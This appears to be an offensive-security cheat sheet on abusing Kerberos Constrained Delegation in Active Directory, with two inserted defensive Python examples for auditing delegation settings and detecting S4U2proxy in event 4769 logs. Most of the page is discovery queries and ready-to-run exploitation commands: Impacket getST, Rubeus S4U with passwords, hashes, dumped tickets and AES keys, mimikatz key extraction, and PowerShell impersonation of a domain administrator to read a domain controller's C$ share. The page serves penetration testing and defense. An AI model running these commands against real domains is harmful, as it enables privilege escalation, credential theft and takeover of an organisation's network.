
Kerberos Delegation - Constrained Delegation

Kerberos Constrained Delegation (KCD) is a Microsoft Active Directory (AD) feature that allows a service to impersonate a user or another service in order to access resources on that principal's behalf. The delegation is "constrained" because the front-end service may only obtain tickets for the services listed in its msDS-AllowedToDelegateTo attribute.

Identify a Constrained Delegation

  • BloodHound: MATCH p = (a)-[:AllowedToDelegate]->(c:Computer) RETURN p
  • PowerView: Get-NetComputer -TrustedToAuth | select samaccountname,msds-allowedtodelegateto | ft
  • Native
Get-DomainComputer -TrustedToAuth | select -exp dnshostname
Get-DomainComputer previous_result | select -exp msds-AllowedToDelegateTo
  • bloodyAD:
bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 get search --filter '(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=16777216))' --attr sAMAccountName,msds-allowedtodelegateto
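The three discovery methods above all key on the same thing: the TRUSTED_TO_AUTH_FOR_DELEGATION bit (0x1000000 = 16777216) in userAccountControl, which marks constrained delegation with protocol transition ("use any authentication protocol"), plus the msDS-AllowedToDelegateTo attribute that lists the permitted back-end SPNs. The following audit helper is an added example written for this page, not code from the original page or from any of the tools named above. It decodes the bitmask on constructed sample LDAP entries (hypothetical account names and SPNs), separates unconstrained from constrained delegation, and also flags accounts whose msDS-AllowedToDelegateTo is populated without the protocol-transition bit, a Kerberos-only constrained delegation that the UAC-bit filters above do not return.

```python
"""Audit helper (added example, not from the original page): classify Active Directory
accounts by delegation type from their userAccountControl bitmask and the
msDS-AllowedToDelegateTo attribute. The input records are constructed to look like
LDAP search results; they are not data from a real domain."""

# userAccountControl bit values (MS-ADTS / MS-SAMR).
UAC_TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
UAC_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # 16777216: protocol transition ("any auth protocol")

# Constructed sample entries (hypothetical names, SPNs and flag combinations).
SAMPLE_ENTRIES = [
    {"sAMAccountName": "WEB01$",
     "userAccountControl": 0x1001000,  # WORKSTATION_TRUST_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION
     "msDS-AllowedToDelegateTo": ["time/SQL01.crash.lab", "time/SQL01"]},
    {"sAMAccountName": "APP02$",
     "userAccountControl": 0x1000,     # plain workstation account, no delegation
     "msDS-AllowedToDelegateTo": []},
    {"sAMAccountName": "svc_iis",
     "userAccountControl": 0x1000200,  # NORMAL_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION
     "msDS-AllowedToDelegateTo": ["cifs/FS01.crash.lab"]},
    {"sAMAccountName": "DC01$",
     "userAccountControl": 0x82000,    # SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION (unconstrained)
     "msDS-AllowedToDelegateTo": []},
    {"sAMAccountName": "svc_report",
     "userAccountControl": 0x200,      # NORMAL_ACCOUNT only: constrained, Kerberos-only (no protocol transition)
     "msDS-AllowedToDelegateTo": ["MSSQLSvc/SQL01.crash.lab:1433"]},
]


def has_protocol_transition(uac):
    """True when the 16777216 bit used by the PowerView/bloodyAD filters is set."""
    return bool(uac & UAC_TRUSTED_TO_AUTH_FOR_DELEGATION)


def delegation_kind(entry):
    """Classify one account: unconstrained, constrained (with or without protocol transition), or none."""
    uac = entry["userAccountControl"]
    targets = entry.get("msDS-AllowedToDelegateTo") or []
    if uac & UAC_TRUSTED_FOR_DELEGATION:
        return "unconstrained"
    if has_protocol_transition(uac):
        return "constrained+protocol-transition"
    if targets:
        return "constrained (Kerberos only)"
    return "none"


def target_hosts(spns):
    """Reduce a list of SPNs (class/host[:port]) to the distinct back-end hosts they name."""
    hosts = set()
    for spn in spns:
        if "/" not in spn:
            continue
        host = spn.split("/", 1)[1].split(":", 1)[0]
        hosts.add(host.lower())
    return sorted(hosts)


def find_delegation(entries):
    """Return one finding per account that delegates in any form, with its back-end hosts."""
    findings = []
    for entry in entries:
        kind = delegation_kind(entry)
        if kind == "none":
            continue
        spns = entry.get("msDS-AllowedToDelegateTo") or []
        findings.append({"account": entry["sAMAccountName"], "kind": kind,
                         "spns": spns, "hosts": target_hosts(spns)})
    return findings


if __name__ == "__main__":
    for f in find_delegation(SAMPLE_ENTRIES):
        print(f"{f['account']:<12} {f['kind']:<32} -> {', '.join(f['hosts']) or '(any: unconstrained)'}")
```

The findings are grouped by back-end host rather than by exact SPN on purpose: the service class in the SPN is not protected by the ticket, which is why the Rubeus commands below carry an /altservice option. For risk scoping, what matters is which hosts a delegating account can reach as another user, and whether that account's credentials are exposed (for example on a low-trust member server).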

Exploit the Constrained Delegation

  • Impacket
getST.py -spn HOST/SQL01.DOMAIN 'DOMAIN/user:password' -impersonate Administrator -dc-ip 10.10.10.10
  • Rubeus: S4U2 attack (S4U2self + S4U2proxy)
# with a password
Rubeus.exe s4u /nowrap /msdsspn:"time/target.local" /altservice:cifs /impersonateuser:"administrator" /domain:"domain" /user:"user" /password:"password"

# with an NT hash
Rubeus.exe s4u /user:user_for_delegation /rc4:user_pwd_hash /impersonateuser:user_to_impersonate /domain:domain.com /dc:dc01.domain.com /msdsspn:time/srv01.domain.com /altservice:cifs /ptt
Rubeus.exe s4u /user:MACHINE$ /rc4:MACHINE_PWD_HASH /impersonateuser:Administrator /msdsspn:"cifs/dc.domain.com" /altservice:cifs,http,host,rpcss,wsman,ldap /ptt
dir \\dc.domain.com\c$
  • Rubeus: use an existing ticket to perform an S4U2 attack to impersonate "Administrator"
# Dump ticket
Rubeus.exe tgtdeleg /nowrap
Rubeus.exe triage
Rubeus.exe dump /luid:0x12d1f7

# Create a ticket
Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:cifs/srv.domain.local /ticket:doIFRjCCBUKgAwIBB...BTA== /ptt
  • Rubeus: using aes256 keys
# Get the aes256 keys of the machine account (mimikatz)
privilege::debug
token::elevate
sekurlsa::ekeys

# Create a ticket
Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:cifs/srv.domain.local /user:win10x64$ /aes256:4b55f...fd82 /ptt
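Every variant above ends in an S4U2proxy request: a front-end service asks the KDC for a service ticket to a back-end SPN on behalf of the impersonated user. On the domain controller that request is logged as a Kerberos service ticket request (Windows Security event 4769) whose "Transited Services" field names the delegating service; ordinary ticket requests leave that field empty ("-"). The following detection logic is an added example for this page, not code from the original page or from Rubeus/Impacket. It runs over constructed 4769-style records (hypothetical hosts, users and addresses), flags every S4U2proxy-issued ticket, raises severity when the impersonated account is on a watch list, and accepts an allow-list of approved (front-end, back-end) pairs so that the legitimate delegation paths found by the discovery step can be baselined.

```python
"""Detection example (added here; not part of the original page): flag service-ticket
requests issued through S4U2proxy from Windows Security event 4769 records. The
records below are constructed, not real logs; field names follow the 4769 event
schema (TargetUserName, ServiceName, IpAddress, TransitedServices, Status)."""

SENSITIVE_ACCOUNTS = {"administrator"}  # constructed watch list of high-value identities

SAMPLE_4769 = [
    # Ordinary user ticket request: no transited services.
    {"EventID": 4769, "TargetUserName": "alice@CRASH.LAB", "ServiceName": "SQL01$",
     "IpAddress": "10.100.10.21", "TransitedServices": "-", "Status": "0x0"},
    # S4U2proxy: WEB01$ obtained a ticket to SQL01$ as Administrator.
    {"EventID": 4769, "TargetUserName": "Administrator@CRASH.LAB", "ServiceName": "SQL01$",
     "IpAddress": "10.100.10.30", "TransitedServices": "WEB01$@CRASH.LAB", "Status": "0x0"},
    # S4U2proxy on an approved path for a regular user (baseline traffic).
    {"EventID": 4769, "TargetUserName": "bob@CRASH.LAB", "ServiceName": "FS01$",
     "IpAddress": "10.100.10.31", "TransitedServices": "svc_iis@CRASH.LAB", "Status": "0x0"},
    # A TGT request (4768) is not a service-ticket request and is ignored.
    {"EventID": 4768, "TargetUserName": "alice@CRASH.LAB", "ServiceName": "krbtgt",
     "IpAddress": "10.100.10.21", "TransitedServices": "-", "Status": "0x0"},
]


def is_s4u2proxy(event):
    """A 4769 with a populated Transited Services field was issued via S4U2proxy."""
    if event.get("EventID") != 4769:
        return False
    return event.get("TransitedServices", "-") not in ("", "-")


def delegated_requests(events, allowed_pairs=frozenset()):
    """Return one alert per S4U2proxy ticket, unless the (front-end, back-end) pair is
    on the allow-list and the impersonated user is not a sensitive account."""
    alerts = []
    for ev in events:
        if not is_s4u2proxy(ev):
            continue
        front_end = ev["TransitedServices"].split("@", 1)[0].upper()
        back_end = ev["ServiceName"].upper()
        user = ev["TargetUserName"].split("@", 1)[0].lower()
        sensitive = user in SENSITIVE_ACCOUNTS
        if (front_end, back_end) in allowed_pairs and not sensitive:
            continue
        alerts.append({
            "front_end": front_end,
            "back_end": back_end,
            "impersonated": user,
            "source": ev["IpAddress"],
            "severity": "high" if sensitive else "medium",
        })
    return alerts


if __name__ == "__main__":
    baseline = {("SVC_IIS", "FS01$")}  # constructed: pairs taken from msDS-AllowedToDelegateTo during the audit
    for a in delegated_requests(SAMPLE_4769, baseline):
        print(f"[{a['severity']}] {a['front_end']} -> {a['back_end']} as {a['impersonated']} from {a['source']}")
```

The allow-list is meant to be built from the msDS-AllowedToDelegateTo values gathered in the discovery step: a delegating account requesting tickets to a host it is configured for is expected, while any S4U2proxy ticket for a privileged account is worth an alert regardless, since accounts in Protected Users or marked "sensitive and cannot be delegated" should never appear there.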

Impersonate a domain user on a resource

Requirements:

  • SYSTEM-level privileges on a machine configured with constrained delegation
PS> [Reflection.Assembly]::LoadWithPartialName('System.IdentityModel') | out-null
PS> $idToImpersonate = New-Object System.Security.Principal.WindowsIdentity @('administrator')
PS> $idToImpersonate.Impersonate()
PS> [System.Security.Principal.WindowsIdentity]::GetCurrent() | select name
PS> ls \\dc01.offense.local\c$